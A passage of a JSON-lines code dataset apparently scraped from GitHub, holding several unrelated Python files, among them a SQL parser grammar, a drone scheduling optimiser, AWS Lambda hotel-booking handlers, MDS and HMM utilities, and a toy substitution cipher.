'patients_by_similarity',\n 'a non-empty List[str]',\n actual)\n\n######## treatment_recommendations\nactual = tf.treatment_recommendations(d, p)\ncheck_type_details(\n isinstance(actual, list) and actual != [] and isinstance(actual[0], str),\n 'treatment_recommendations',\n 'a non-empty List[str]',\n actual)\n\n######## make_treatment_plans\ncheck_function(tf.make_treatment_plans, [d, d], type(None))\n\n\nprint('============= End: checking parameter and return types =============\\n')\n\nprint('======= Start: checking whether functions modify constants =======')\n\n# Get the final values of the constants\nCONSTS_AFTER = [\n tf.NA, tf.TREATMENT, tf.PATIENT_ID_INDEX, tf.NAME_TO_VALUE,\n tf.ID_TO_ATTRIBUTES, tf.VALUE_TO_IDS, tf.ID_TO_SIMILARITY]\n\n# Check whether the constants are 
unchanged.\nprint('Checking whether functions modify constants...')\nassert CONSTS_BEFORE == CONSTS_AFTER, \\\n ('Your function(s) modified the value of some constant(s). Edit your' +\n '\\ncode so that the values of constants are unchanged by your functions.')\nprint(' check complete')\n\nprint('=========== End: checking whether functions modify constants ====')\n","repo_name":"Justinnnnnnz/Project","sub_path":"Medical Treatment Plan Auto Recommendation App Based on ML Algo/a3_simple_checker.py","file_name":"a3_simple_checker.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"31711341432","text":"# encoding: utf-8\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n# Author: Kyle Lahnakoski (kyle@lahnakoski.com)\n#\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport ast\n\nfrom pyparsing import \\\n CaselessLiteral, Word, delimitedList, Optional, Combine, Group, alphas, \\\n nums, alphanums, Forward, restOfLine, Keyword, Literal, ParserElement, infixNotation, opAssoc, Regex, MatchFirst\n\nParserElement.enablePackrat()\nDEBUG = False\n\nkeywords = [\"select\", \"from\", \"where\", \"group by\", \"order by\", \"with\", \"as\"]\n\nKNOWN_OPS = [\n {\"op\": \"*\", \"name\": \"mult\"},\n {\"op\": \"/\", \"name\": \"div\"},\n {\"op\": \"+\", \"name\": \"add\"},\n {\"op\": \"-\", \"name\": \"sub\"},\n {\"op\": \"=\", \"name\": \"eq\"},\n {\"op\": \"!=\", \"name\": \"neq\"},\n {\"op\": \"<>\", \"name\": \"neq\"},\n {\"op\": \">\", \"name\": \"gt\"},\n {\"op\": \"<\", \"name\": \"lt\"},\n {\"op\": \">=\", \"name\": \"gte\"},\n {\"op\": \"<=\", \"name\": \"lte\"},\n {\"op\": \"in\", \"name\": \"in\"},\n {\"op\": \"not\", \"name\": \"not\", \"arity\": 1},\n {\"op\": \"and\", \"name\": \"and\"},\n {\"op\": \"or\", \"name\": \"or\"}\n]\n\nlocs = locals()\nreserved = []\nfor k in keywords:\n name, value = k.upper().replace(\" \", \"\"), Keyword(k, caseless=True)\n locs[name] = value\n reserved.append(value)\nfor o in KNOWN_OPS:\n name = o['op'].upper()\n value = locs[name] = o['literal'] = CaselessLiteral(o['op'])\n reserved.append(value)\n\nRESERVED = MatchFirst(reserved)\n\n\ndef to_json_operator(instring, tokensStart, retTokens):\n # ARRANGE INTO {op: params} FORMAT\n tok = retTokens[0]\n op = [o for o in KNOWN_OPS if o['op'] == tok[1]][0]['name']\n return {op: [tok[i * 2] for i in range(int((len(tok) + 1) / 2))]}\n\n\ndef to_json_call(instring, tokensStart, retTokens):\n # ARRANGE INTO {op: params} FORMAT\n tok = retTokens\n op = tok.op\n params = tok.params[0]\n if not params:\n params = None\n elif len(params) == 1:\n params = params[0]\n return {op: params}\n\n\ndef unquote(instring, tokensStart, retTokens):\n val = retTokens[0]\n if val.startswith(\"'\") and val.endswith(\"'\"):\n val = \"'\"+val[1:-1].replace(\"''\", \"\\\\'\")+\"'\"\n val = val.replace(\".\", \"\\\\.\")\n elif val.startswith('\"') and val.endswith('\"'):\n val = '\"'+val[1:-1].replace('\"\"', '\\\\\"')+'\"'\n val = val.replace(\".\", \"\\\\.\")\n\n un = ast.literal_eval(val)\n return un\n\n# NUMBERS\nE = CaselessLiteral(\"E\")\n# binop = oneOf(\"= != < > >= <= eq ne lt le gt ge\", caseless=True)\narithSign = Word(\"+-\", exact=1)\nrealNum = Combine(\n Optional(arithSign) +\n (Word(nums) + \".\" 
+ Optional(Word(nums)) | (\".\" + Word(nums))) +\n Optional(E + Optional(arithSign) + Word(nums))\n).addParseAction(unquote)\nintNum = Combine(\n Optional(arithSign) +\n Word(nums) +\n Optional(E + Optional(\"+\") + Word(nums))\n).addParseAction(unquote)\n\n# SQL STRINGS\nsqlString = Combine(Regex(r\"\\'(\\'\\'|\\\\.|[^'])*\\'\")).addParseAction(unquote)\nidentString = Combine(Regex(r'\\\"(\\\"\\\"|\\\\.|[^\"])*\\\"')).addParseAction(unquote)\n\n# EXPRESSIONS\nexpr = Forward()\n\nident = Combine(~RESERVED + (delimitedList(Word(alphas, alphanums + \"_$\") | identString, \".\", combine=True))).setName(\"identifier\")\nprimitive = realNum(\"literal\") | intNum(\"literal\") | sqlString | ident\nselectStmt = Forward()\ncompound = Group(\n realNum(\"literal\").setName(\"float\").setDebug(DEBUG) |\n intNum(\"literal\").setName(\"int\").setDebug(DEBUG) |\n sqlString(\"literal\").setName(\"string\").setDebug(DEBUG) |\n (Literal(\"(\").suppress() + Group(delimitedList(expr)) + Literal(\")\").suppress()).setDebug(DEBUG) |\n (Word(alphas)(\"op\").setName(\"function name\") + Literal(\"(\") + Group(delimitedList(expr))(\"params\") + \")\").addParseAction(to_json_call).setDebug(DEBUG) |\n ident\n)\nexpr << Group(infixNotation(\n compound,\n [(o['literal'], o.get('arity', 2), opAssoc.LEFT, to_json_operator) for o in KNOWN_OPS]\n).setName(\"expression\"))\n\n# SQL STATEMENT\ncolumn = Group(\n Group(expr).setName(\"expression\")(\"value\") + AS + ident.setName(\"column name\")(\"name\").setDebug(DEBUG) |\n Group(expr).setName(\"expression\")(\"value\") + ident.setName(\"column name\")(\"name\").setDebug(DEBUG) |\n Group(expr).setName(\"expression\")(\"value\").setDebug(DEBUG) |\n Literal('*')(\"value\").setDebug(DEBUG)\n).setName(\"column\")\ntableName = ident.setName(\"table name\")\n\n# define SQL tokens\nselectStmt << (\n SELECT.suppress() + delimitedList(column)(\"select\") +\n FROM.suppress() + delimitedList(tableName)(\"from\") +\n Optional(WHERE.suppress() + Group(expr).setName(\"expression\"))(\"where\") +\n Optional(GROUPBY.suppress() + Group(delimitedList(column)).setName(\"columns\"))(\"groupby\") +\n Optional(ORDERBY.suppress() + Group(delimitedList(column)).setName(\"columns\"))(\"orderby\")\n)\n\nSQLParser = selectStmt\n\n# IGNORE SOME COMMENTS\noracleSqlComment = Literal(\"--\") + restOfLine\nmySqlComment = Literal(\"#\") + restOfLine\nSQLParser.ignore(oracleSqlComment | mySqlComment)\n\n","repo_name":"pombredanne/moz-sql-parser","sub_path":"moz_sql_parser/sql_parser.py","file_name":"sql_parser.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"23518801100","text":"from odoo import models, fields, api\n\nclass ReportActivity(models.AbstractModel):\n _name = 'report.planner.activity_report'\n _description = 'Plan Activity'\n\n # (Start_date >= FSD and strart_date <= FLD) or (end_date >= FSD and end_date <= FLD)\n\n def _get_report_values(self, docids, data):\n self.model = self.env.context.get('active_model')\n docs = self.env[self.model].browse(self.env.context.get('active_ids'))\n if data['form']['all'] == True: \n activity_ids = self.env['plan.activity'].search(['|','&',('start_date','>=', data['form']['start_date']),('start_date','<=', data['form']['end_date']),'&',('end_date','>=', data['form']['start_date']),('end_date','<=', data['form']['end_date'])])\n plan_ids = self.env['project.plan'].search([])\n else:\n activity_ids = self.env['plan.activity'].search(['&','|','&',('start_date','>=', 
data['form']['start_date']),('start_date','<=', data['form']['end_date']),'&',('end_date','>=', data['form']['start_date']),('end_date','<=', data['form']['end_date']),('plan_id', 'in', data['form']['plan_ids'])])\n plan_ids = self.env['project.plan'].search([('id', 'in', data['form']['plan_ids'])])\n return {\n 'doc_ids': self.ids,\n 'doc_model': self.model,\n 'docs': docs,\n 'data': data['form'],\n 'activity_ids':activity_ids,\n 'plan_ids':plan_ids,\n }","repo_name":"charles-123456/Cristo","sub_path":"v13/addons/planner/report/report_activity.py","file_name":"report_activity.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"21077031746","text":"import itertools\nfrom typing import List\n# import gurobipy as gp\nfrom gurobipy import *\nimport numpy as np\nimport simplejson\n\nIP_ABSOLUTE_GAP = 1000 # absolute MIP gap, in seconds of makespan, at which the IP solver may stop\nIP_TIME_LIMIT = 600 # time limit in seconds after which the IP solver terminates\n\ncapacities = [(20, 10), (50, 20), (60, 20), (100, 20), (200, 20), (500, 20), (1000, 1000)] # a list of tuples of the format: (capacity, max point capacity)\nspeed_km_h = 60 # Speed of the drones in km/h\nstop_time_min = 15 # Time drones spend in a cell\n\n\nstop_time_sec = stop_time_min*60\nspeed_m_s = speed_km_h*1000/(60*60)\n\n\ndef run_IP(number_of_drones: int, jobs_durations: List[float]):\n \"\"\"\n Solves an Integer Program for the Minimum Makespan Scheduling problem using the Gurobi solver.\n It might not be necessary to solve this IP to optimality, so we expose the IP_ABSOLUTE_GAP parameter, which allows\n the solver to stop when the best obtained solution is within IP_ABSOLUTE_GAP of optimality.\n\n We also make available an approximate LPT algorithm for this problem, which finds a solution within 4/3 - 1/(3m) of the optimum.\n :param number_of_drones: Between how many drones the tours will be divided. 
Should be a positive integer number.\n :param jobs_durations: A list of job durations.\n :return: A dictionary of assignments of drones to jobs (in the format \"drone_id: [jobs_ids]\") and a list of total job durations for every drone.\n \"\"\"\n print(number_of_drones)\n m = Model(\"Minimum makespan scheduling\")\n drones = range(number_of_drones)\n jobs = range(len(jobs_durations))\n jobs_to_drones_indices = list(itertools.product(drones, jobs))\n\n jobs_to_drones = m.addVars(jobs_to_drones_indices, name=\"drone_job\", vtype=GRB.BINARY)\n max_time_length = m.addVar(name=\"max_time_length\", vtype=GRB.CONTINUOUS)\n m.addConstrs((quicksum([jobs_to_drones[(drone, job)] for drone in drones]) == 1 for job in jobs)) #each job is assigned somewhere\n m.addConstrs((quicksum([jobs_to_drones[(drone, job)]*jobs_durations[job] for job in jobs]) <= max_time_length for drone in drones))\n\n m.setObjective(max_time_length, GRB.MINIMIZE)\n m.Params.MIPGapAbs = IP_ABSOLUTE_GAP\n m.Params.TimeLimit = IP_TIME_LIMIT\n m.optimize()\n\n jobs_assignment = {}\n\n for drone in drones:\n jobs_assignment[drone] = [job for job in jobs if jobs_to_drones[(drone, job)].X >= 0.8]\n\n bins = [sum([jobs_durations[job] for job in jobs if jobs_to_drones[(drone, job)].X >= 0.8]) for drone in drones]\n\n return jobs_assignment, bins\n\n\ndef lpt(number_of_drones: int, jobs: List[int]):\n \"\"\"\n Does the same as run_IP, but instead of solving the IP, it runs the Longest Processing Time algorithm, which gives\n a solution within 4/3 - 1/(3m) of the optimum, where m is the number of drones.\n :param number_of_drones: Between how many drones the tours will be divided. Should be a positive integer number.\n :param jobs: A list of job durations.\n :return: A dictionary of assignments of drones to jobs (in the format \"drone_id: [jobs_ids]\") and a list of total job durations for every drone.\n \"\"\"\n bins = np.zeros(number_of_drones)\n jobs_assignment = {}\n\n original_indices = np.argsort(jobs)[::-1]\n sorted_jobs = np.sort(jobs)[::-1]\n\n for i in range(len(original_indices)):\n job_length = sorted_jobs[i]\n job_original_index = original_indices[i]\n\n min_bin_index = np.argmin(bins)\n\n bins[min_bin_index] = bins[min_bin_index] + job_length\n\n if min_bin_index not in jobs_assignment:\n jobs_assignment[min_bin_index] = []\n\n jobs_assignment[min_bin_index].append(job_original_index)\n\n return jobs_assignment, bins.tolist()\n\n
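# Added worked example (hypothetical durations): lpt(2, [5, 4, 3, 3]) sorts the\n# jobs to [5, 4, 3, 3] and greedily assigns each one to the least-loaded drone,\n# yielding bins of [8, 7].\n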
bins = run_IP(number_of_drones, jobs)\n results.append({\n 'number_of_drones': number_of_drones,\n 'jobs_assignment': [[int(x) for x in value] for (key, value) in jobs_assignment.items()],\n 'bins': bins,\n 'routes': [[routes['routes'][route] for route in jobs] for (drone_id, jobs) in jobs_assignment.items()]\n })\n\n with open('./results/schedule_ip_capacity_{}_{}'.format(capacity[0], capacity[1]), 'w') as res_f:\n simplejson.dump({'assignments': results, 'all_routes': routes}, res_f)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"undefiened/corona_drones","sub_path":"assign_tours.py","file_name":"assign_tours.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70416778171","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom sklearn.datasets import load_breast_cancer\n\n\ndef mds(data, d):\n \"\"\"\n input:data(ndarray): data to be reduced\n d(int): number of dimensions after reduction\n output:Z(ndarray): the dimensionality-reduced data\n \"\"\"\n # ********* Begin *********#\n # Compute the squared-distance matrix dist2\n m = data.shape[0]\n dist2 = np.zeros((m, m))\n for i in range(m):\n for j in range(i + 1, m):\n dist2[i, j] = np.linalg.norm(data[i] - data[j]) ** 2\n dist2[j, i] = dist2[i, j]\n # Compute the inner-product matrix B (double centering)\n B = np.zeros((m, m))\n dist2ij = np.mean(dist2)\n dist2i = np.mean(dist2, axis=1)\n dist2j = np.mean(dist2, axis=0)\n for i in range(m):\n for j in range(m):\n B[i, j] = -0.5 * (dist2[i, j] - dist2j[j] - dist2i[i] + dist2ij)\n\n # Eigendecompose B to obtain eigenvalues and eigenvectors\n value, vector = np.linalg.eigh(B)\n V = vector[:, : -d - 1: -1]\n A = value[: -d - 1: -1]\n # Compute Z\n Z = np.dot(V, np.sqrt(np.diag(A)))\n # ********* End *********#\n return Z\n\n\nif __name__ == '__main__':\n data = load_breast_cancer().data\n d = 2\n print(mds(data, d))\n","repo_name":"Green-Wood/hands-on-statistical-learning","sub_path":"4. 
dimensionality_reduction/MDS.py","file_name":"MDS.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"26445741814","text":"import boto3\nfrom botocore.exceptions import ClientError\nimport json\nfrom typing import List\nfrom math import radians, cos, sin, asin, sqrt\nfrom dataclasses import dataclass\nfrom enum import Enum\nimport sys\nimport datetime\n\ndynamodb = boto3.client(\"dynamodb\")\ntable = dynamodb.Table(\"users\")\n# 17 lines, 11 non-appl\ndef user_handler(event, context):\n username = event[\"username\"]\n password = event[\"password\"]\n if event[\"type\"] == \"CREATE_USER\":\n user_item = {username: username, password: password}\n dynamodb.put_item(TableName=\"users\", Item=json.dump(user_item))\n\n return {\"message\": \"created a user!\"}\n elif event[\"type\"] == \"LOGIN_USER\":\n try:\n response = table.get_item(Key={\"username\": username})\n except ClientError as e:\n return {\"message\": \"user not found\"}\n else:\n user = json.loads(response[\"Item\"])\n return {\"message\": user[\"password\"] == password}\n\n\n# 13 lines, 8 non-appl\nclient = boto3.client(\"lambda\")\n\n\ndef search_handler(event, context):\n lat = event[\"lat\"]\n lon = event[\"lon\"]\n\n payload = json.dumps({\"lat\": lat, \"lon\": lon})\n geo_response = client.invoke(\n FunctionName=\"geo\", InvocationType=\"Event\", Payload=payload\n )\n geo_payload = json.loads(geo_response.read())\n nearby_hotels: List[str] = geo_payload(\"hotel_ids\")\n\n payload = json.dumps({\"hotel_ids\": nearby_hotels})\n rate_response = client.invoke(\n FunctionName=\"rate\", InvocationType=\"Event\", Payload=payload\n )\n rate_payload = json.loads(rate_response.read())\n rate_plans: List[str] = rate_payload.get(\"hotel_ids\")\n\n return {\"message\": rate_plans}\n\n\nMAX_SEARCH_RESULTS = 5\nMAX_SEARCH_RADIUS = 10\ndynamodb = boto3.client(\"dynamodb\")\ntable = dynamodb.Table(\"geo\")\n\n\n@dataclass\nclass GeoPoint:\n hotelId: str\n lat: float\n lon: float\n\n\ndef _dist(lat1, long1, lat2, long2):\n \"\"\"\n Calculate the great circle distance between two points\n on the earth (specified in decimal degrees)\n\n Taken from: https://medium.com/analytics-vidhya/finding-nearest-pair-of-latitude-and-longitude-match-using-python-ce50d62af546\n \"\"\"\n # convert decimal degrees to radians\n lat1, long1, lat2, long2 = map(radians, [lat1, long1, lat2, long2])\n # haversine formula\n dlon = long2 - long1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n # Radius of earth in kilometers is 6371\n km = 6371 * c\n return km\n\n\n# 31 lines, 10 NAP\ndef geo_handler(event, context):\n lat = event[\"lat\"]\n lon = event[\"lon\"]\n\n try:\n response = table.get_item(Key={\"geo_points\": \"geo_points\"}) # Global key\n except ClientError as e:\n return {\"message\": \"geo points not found\"}\n else:\n geo_points_raw = json.loads(response[\"Item\"])\n geo_points = []\n for geo_point in geo_points_raw:\n geo_points.append(\n GeoPoint(geo_point[\"hotelId\"], geo_point[\"lat\"], geo_point[\"lon\"])\n )\n\n all_distances = [\n (point.hotelId, _dist(point.lat, point.lon, float(lat), float(lon)))\n for point in geo_points\n ]\n # This is quite inefficient for large lists, but we can improve it later.\n all_distances = [dist for dist in all_distances if dist[1] <= MAX_SEARCH_RADIUS]\n all_distances.sort(key=lambda x: x[1], reverse=False)\n\n limit_distances = 
all_distances[0:MAX_SEARCH_RESULTS]\n\n return {\"message\": list([x[0] for x in limit_distances])}\n\n\ndynamodb = boto3.client(\"dynamodb\")\ntable = dynamodb.Table(\"profile\")\n\n\n@dataclass\nclass Address:\n\n streetNumber: str\n streetName: str\n city: str\n state: str\n country: str\n postalCode: str\n lat: float\n lon: float\n\n\n@dataclass\nclass HotelProfile:\n id: str\n name: str\n phoneNumber: str\n description: str\n address: Address\n\n\n# 33 LOC, 12 NAP\ndef profile_handler(event, context):\n hotel_ids = event[\"hotel_ids\"]\n\n try:\n response = table.batch_get_item(Keys={\"hotels\": hotel_ids})\n except ClientError as e:\n return {\"message\": \"hotels not found\"}\n else:\n hotels: List[HotelProfile] = []\n\n for h_ser in response.items():\n h = json.loads(h_ser)\n hotels.append(\n HotelProfile(\n h[\"id\"],\n h[\"name\"],\n h[\"phoneNumber\"],\n h[\"description\"],\n Address(\n h[\"streetNumber\"],\n h[\"streetName\"],\n h[\"city\"],\n h[\"state\"],\n h[\"country\"],\n h[\"postalCode\"],\n h[\"lat\"],\n h[\"lon\"],\n ),\n )\n )\n return {\"message\": hotels}\n\n\n@dataclass\nclass RoomType:\n bookableRate: int\n code: str\n description: str\n totalRate: int\n totalRateInclusive: int\n\n\n@dataclass\nclass RatePlan:\n\n hotelId: str\n code: str\n inDate: str\n outDate: str\n roomType: RoomType\n\n\ndynamodb = boto3.client(\"dynamodb\")\ntable = dynamodb.Table(\"rate\")\n\n# 30 LOC, 13 NAP\ndef rate_handler(event, context):\n hotel_ids = event[\"hotel_ids\"]\n\n try:\n response = table.batch_get_item(Keys={\"hotels\": hotel_ids})\n except ClientError as e:\n return {\"message\": \"hotels not found\"}\n else:\n hotels: List[RatePlan] = []\n\n for h_ser in response.items():\n h = json.loads(h_ser)\n hotels.append(\n RatePlan(\n h[\"hotelId\"],\n h[\"code\"],\n h[\"inDate\"],\n h[\"outDate\"],\n RoomType(\n h[\"bookableRate\"],\n h[\"code\"],\n h[\"description\"],\n h[\"totalRate\"],\n h[\"totalRateInclusive\"],\n ),\n )\n )\n return {\"message\": hotels}\n\n\n@dataclass\nclass HotelRecommend:\n hotelId: str\n lat: float\n lon: float\n rate: float\n price: float\n\n\nclass RecommendType(Enum):\n DISTANCE = \"DISTANCE\"\n RATE = \"RATE\"\n PRICE = \"PRICE\"\n\n\ndynamodb = boto3.client(\"dynamodb\")\ntable = dynamodb.Table(\"recommend\")\n\n# 54 LOC, 14 NAC\ndef recommend_handler(event, context):\n recommend_params = event[\"recommend_params\"]\n recommend_type = RecommendType.value(event[\"recommend_type\"])\n hotel_ids = event[\"hotel_ids\"]\n\n try:\n response = table.batch_get_item(Keys={\"hotels\": hotel_ids})\n except ClientError as e:\n return {\"message\": \"hotels not found\"}\n else:\n hotels: List[HotelProfile] = []\n\n for h_ser in response.items():\n h = json.loads(h_ser)\n hotels.append(h[\"hotelId\"], h[\"lat\"], h[\"lon\"], h[\"rate\"], h[\"price\"])\n\n if recommend_type == RecommendType.DISTANCE:\n # Hotels with minimal distance.\n\n lat: float = recommend_params[\"lat\"]\n lon: float = recommend_params[\"lon\"]\n\n min_dist: float = sys.float_info.max\n return_hotels: List[str] = []\n for hotel in hotels:\n dist: float = _dist(lat, lon, hotel.lat, hotel.lon)\n\n if dist < min_dist:\n min_dist = dist\n\n for hotel in hotels:\n dist: float = _dist(lat, lon, hotel.lat, hotel.lon)\n\n if dist == min_dist:\n return_hotels.append(hotel.hotelId)\n return {\"message\": return_hotels}\n\n elif recommend_type == RecommendType.RATE:\n # Hotels with maximum rate.\n max_rate: float = 0\n\n for hotel in hotels:\n rate: int = hotel.rate\n\n if rate > max_rate:\n max_rate 
= rate\n\n return {\n \"message\": [hotel.hotelId for hotel in hotels if hotel.rate == max_rate]\n }\n elif recommend_type == RecommendType.PRICE:\n # Hotels with minimal price.\n min_price: float = sys.float_info.max\n\n for hotel in hotels:\n if hotel.price < min_price:\n min_price = hotel.price\n\n return {\n \"message\": [hotel.hotelId for hotel in hotels if hotel.price == min_price]\n }\n\n\n@dataclass\nclass HotelReservation:\n\n customerId: str\n inDate: datetime\n outDate: datetime\n numberOfRooms: int\n\n def has_date_conflict(self, in_date: datetime, out_date: datetime) -> bool:\n return in_date <= self.outDate and out_date >= self.inDate\n\n\ndef check_availability(\n reservations: List[HotelReservation],\n max_capacity: int,\n in_date: str,\n out_date: str,\n number_of_rooms: int,\n) -> bool:\n in_date = datetime.strptime(in_date, \"%Y-%m-%d\")\n out_date = datetime.strptime(out_date, \"%Y-%m-%d\")\n\n current_capacity: int = sum(\n [\n reserve.numberOfRooms\n for reserve in reservations\n if reserve.has_date_conflict(in_date, out_date)\n ]\n )\n return not (current_capacity + number_of_rooms > max_capacity)\n\n\ndynamodb = boto3.client(\"dynamodb\")\ntable = dynamodb.Table(\"hotel\")\n\n# 60 LOC, 29 NAP\ndef reserve_handler(event, context):\n hotel_id = event[\"hotel_id\"]\n\n # Load hotel\n try:\n response = table.get_item(Keys={\"hotel\": hotel_id})\n except ClientError as e:\n return {\"message\": \"hotel not found\"}\n else:\n hotel_reservations: List[HotelReservation] = []\n h = json.loads(response[\"Item\"])\n max_capacity = h[\"max_capacity\"]\n\n for r in h[\"reservations\"]:\n hotel_reservations.append(\n r[\"customerId\"], r[\"inDate\"], r[\"outDate\"], r[\"numberOfRooms\"]\n )\n\n if event[\"type\"] == \"AVAILABILITY\":\n return {\n \"message\": check_availability(\n hotel_reservations,\n max_capacity,\n event[\"in_date\"],\n event[\"out_date\"],\n event[\"number_of_rooms\"],\n )\n }\n elif event[\"type\"] == \"RESERVE_ROOM\":\n if not check_availability(\n hotel_reservations,\n max_capacity,\n event[\"in_date\"],\n event[\"out_date\"],\n event[\"number_of_rooms\"],\n ):\n return {\"message\": False}\n\n in_date = datetime.strptime(event[\"in_date\"], \"%Y-%m-%d\")\n out_date = datetime.strptime(event[\"out_date\"], \"%Y-%m-%d\")\n\n hotel_reservations.append(\n HotelReservation(\n event[\"customer_name\"], in_date, out_date, event[\"number_of_rooms\"]\n )\n )\n reservations = []\n for r in hotel_reservations:\n reservations.append(\n {\n \"customerId\": r.customerId,\n \"inDate\": r.inDate,\n \"outDate\": r.outDate,\n \"number_of_rooms\": r.numberOfRooms,\n }\n )\n table.put_item(\n Item={\n \"hotel_id\": hotel_id,\n \"max_capacity\": max_capacity,\n \"reservations\": reservations,\n }\n )\n\n return {\"message\": True}\n","repo_name":"delftdata/stateflow-evaluation","sub_path":"alternative/aws_lambda_alt.py","file_name":"aws_lambda_alt.py","file_ext":"py","file_size_in_byte":11175,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"27864689777","text":"from __future__ import division\r\nimport numpy as np\r\nfrom hmmlearn import hmm, base\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport sklearn.cluster\r\n\r\n\r\ndef seq_likelihood(seq, n = 3):\r\n if not isinstance(seq, np.ndarray):\r\n seq = np.array(seq)\r\n seq = seq[abs(seq)!=np.inf]\r\n if len(seq) < n:\r\n lh = np.mean(seq)\r\n else:\r\n tmp = np.zeros(len(seq)-n+1)\r\n for i in range(tmp.size):\r\n tmp[i] = np.mean(seq[i:i+n])\r\n lh = 
np.amin(tmp)\r\n return lh\r\n\r\ndef KMeans_test(kmeans, test_vts):\r\n if not isinstance(test_vts, np.ndarray):\r\n test_vts = np.array(test_vts)\r\n test_labels = kmeans.predict(test_vts[:,:-1])\r\n return test_labels\r\n\r\ndef KMeans_postures(train_vts, k):\r\n if not isinstance(train_vts, np.ndarray):\r\n train_vts = np.array(train_vts)\r\n kmeans = sklearn.cluster.KMeans(n_clusters = k).fit(train_vts[:,:-1])\r\n print('kmeans dimension: %d' % (kmeans.cluster_centers_.shape[1]))\r\n return kmeans.cluster_centers_, kmeans.labels_, kmeans\r\n\r\ndef train_hmm(input_data, state_num, obs_num):\r\n '''convert data to appropriate form'''\r\n data = np.array([]).reshape(-1)\r\n obs_lengths = []\r\n for vt in input_data:\r\n data = np.concatenate((data, vt.reshape(-1)), axis = 0)\r\n obs_lengths.append(len(vt))\r\n '''random weight initialization'''\r\n prior0 = np.zeros([1, state_num])\r\n prior0[0,0] = 1.\r\n transmat0 = np.random.rand(state_num, state_num)\r\n obsmat0 = np.random.rand(state_num, obs_num)\r\n '''specify structure'''\r\n for i in range(state_num):\r\n for j in range(state_num):\r\n if (j-i) not in [0, 1]:\r\n transmat0[i,j] = 0\r\n transmat0 = normalize_transmat(transmat0)\r\n obsmat0 = normalize_transmat(obsmat0)\r\n '''training'''\r\n model = hmm.MultinomialHMM(n_components = state_num, n_iter = 50)\r\n model.n_features = obs_num\r\n model.startprob_ = prior0\r\n model.transmat_ = transmat0\r\n model.emissionprob_ = obsmat0\r\n data = LabelEncoder().fit_transform(data)\r\n model.fit(np.atleast_2d(data).T, lengths = np.array(obs_lengths).reshape(-1))\r\n return model\r\n\r\n'''sum each row is 1'''\r\ndef normalize_transmat(transmat):\r\n new_transmat = np.array([list(row/sum(row)) for row in transmat])\r\n return new_transmat\r\n \r\n","repo_name":"nguyetn89/skeleton-HMM","sub_path":"func_HMM.py","file_name":"func_HMM.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"72699638013","text":"class Encryption:\r\n def __init__(self, message, key, user):\r\n self.message = message.lower()\r\n self.key = key\r\n self.user = user\r\n encrypting = dict(zip(self.key, self.key[::-1]))\r\n encrypted_message = \"\".join(encrypting[letters] for letters in message)\r\n # noinspection PyRedundantParentheses\r\n print(f\"Encrypted Message - \", (encrypted_message))\r\n decrypted_message = \"\".join(encrypting[letters] for letters in encrypted_message)\r\n # noinspection PyRedundantParentheses\r\n print(f\"Decrypted Message - \", (decrypted_message))\r\n print(f''+self.user+\" exited Successfully\")\r\n\r\n\r\ndef encrypt(userid):\r\n user = userid\r\n Encryption_message = input(\"Enter Your message : \")\r\n E_key = open(\"key.key\", \"rb\")\r\n Encryption_key = E_key.read().decode('utf-8')\r\n E_key.close()\r\n Encryption(Encryption_message, Encryption_key, user)\r\n","repo_name":"saravanan-sathiyamoorthi/encryption","sub_path":"encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30476246758","text":"import subprocess;\nimport re;\nimport json;\nimport sys;\nimport os;\nsys.path.append(\".\");\nimport common\n\n# Scans files for comments of the form /*JSON......*/ and then builds a tree structure of ifs to\n# efficiently detect the symbols without using RAM. 
See common.py for formatting\n\njsondatas = common.get_jsondata(False)\nincludes = common.get_includes_from_jsondata(jsondatas)\n\n# ------------------------------------------------------------------------------------------------------\n\ndef addToTree(tree, name, jsondata):\n if len(name)==0:\n if \"\" in tree: tree[\"\"].append(jsondata)\n else: tree[\"\"] = [ jsondata ]\n else:\n firstchar = name[:1]\n if not firstchar in tree: tree[firstchar] = {}\n addToTree(tree[firstchar], name[1:], jsondata)\n\n# ------------------------------------------------------------------------------------------------------\n# Creates something like 'name[0]=='s' && name[1]=='e' && name[2]=='t' && name[3]==0'\ndef createStringCompare(varName, checkOffsets, checkCharacters):\n checks = []\n # if we're doing multiple checks, batch up into int compare\n while len(checkOffsets)>3:\n checkOffset = checkOffsets.pop(0)\n checkOffsets.pop(0)\n checkOffsets.pop(0)\n checkOffsets.pop(0)\n checkWC = [checkCharacters.pop(0),checkCharacters.pop(0),checkCharacters.pop(0),checkCharacters.pop(0)]\n checks.append(\"(*(unsigned int*)&\"+varName+\"[\"+str(checkOffset)+\"])==CH('\"+(\"','\".join(checkWC))+\"')\")\n # finish up with single checks\n while len(checkOffsets)>0:\n checkOffset = checkOffsets.pop(0)\n checkCharacter = checkCharacters.pop(0)\n checks.append(varName+\"[\"+str(checkOffset)+\"]=='\"+checkCharacter+\"'\")\n return \" && \".join(checks)\n# ------------------------------------------------------------------------------------------------------\n\ndef getTestFor(className, static):\n if static:\n #return 